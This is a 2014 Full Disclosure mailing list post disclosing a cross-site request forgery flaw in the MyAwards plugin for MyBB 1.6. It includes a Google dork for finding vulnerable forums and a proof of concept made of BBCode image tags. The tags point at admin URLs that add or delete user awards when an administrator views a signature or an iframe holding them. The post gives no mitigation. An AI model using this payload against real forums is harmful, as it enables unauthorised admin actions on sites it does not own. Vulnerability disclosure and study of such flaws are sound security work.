Full Disclosure mailing list archives

MyBB 1.6 - MyAwards CSRF

From: surivaton surivaton <surivaton () gmail com>
Date: Fri, 22 Aug 2014 18:52:01 +1000

# Google Dork: allinurl:myawards.php
# Date: 08/17/2014
# Exploit Author: Vagineer https://vagineering.me
# Version: ALL VERSIONS
# Tested on: MyBB 1.6.15

PoC(set this as your signature or iframe it)
Add awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
[/img]
Remove awards
[img]
https://website.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
 [/img]

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread:

MyBB 1.6 - MyAwards CSRF surivaton surivaton (Aug 25)